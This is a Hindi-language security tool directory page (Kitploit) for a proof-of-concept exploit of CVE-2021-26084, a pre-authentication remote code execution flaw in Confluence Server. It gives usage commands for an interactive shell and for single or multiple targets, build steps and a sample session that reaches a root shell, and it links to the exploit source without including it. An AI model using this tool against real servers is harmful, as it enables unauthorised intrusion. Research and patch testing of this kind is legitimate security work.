Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-26084 — CVE-2021-26084 - Confluence Server Webwork OGNL इंजेक्शन (प्री-ऑथ RCE) | Kitploit
उपकरण/GitHubGitHub/taythebot/cve-2021-26084
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubtaythebot/cve-2021-26084

CVE-2021-26084

CVE-2021-26084 - Confluence Server Webwork OGNL इंजेक्शन (प्री-ऑथ RCE)

रिपॉजिटरी देखें
865 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-26084

CVE-2021-26084 के लिए प्रूफ ऑफ कॉन्सेप्ट।

Confluence Server Webwork OGNL इंजेक्शन (Pre-Auth RCE)

अस्वीकरण

यह केवल शैक्षिक उद्देश्यों के लिए है। मैं आपके कार्यों के लिए जिम्मेदार नहीं हूँ। अपने विवेक से उपयोग करें।

कमांड सीमाएँ

पेलोड के कारण, कुछ अक्षरों को पास करना संभव नहीं है। नीचे की सूची मैंने अपने परीक्षण के दौरान पाई है।

  • डबल कोटेशन "
  • वर्टिकल बार |

इंटरएक्टिव शेल

root@kitploit:~
 go run exploit.go -t <target> -i

उदाहरण

root@kitploit:~
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • केवल एकल लक्ष्य पर काम करता है
  • इंटरएक्टिव शेल से बाहर निकलने के लिए exit टाइप करें
  • नोटिस दिखाता है कि संभवतः विंडोज मशीन है

एकल लक्ष्य

root@kitploit:~
go run exploit.go -t <target> -c <command>

एकाधिक लक्ष्य

root@kitploit:~
go run exploit.go -f <file> -c <command>

निर्माण

root@kitploit:~
go mod download
go build exploit.go
टूल डाउनलोड करें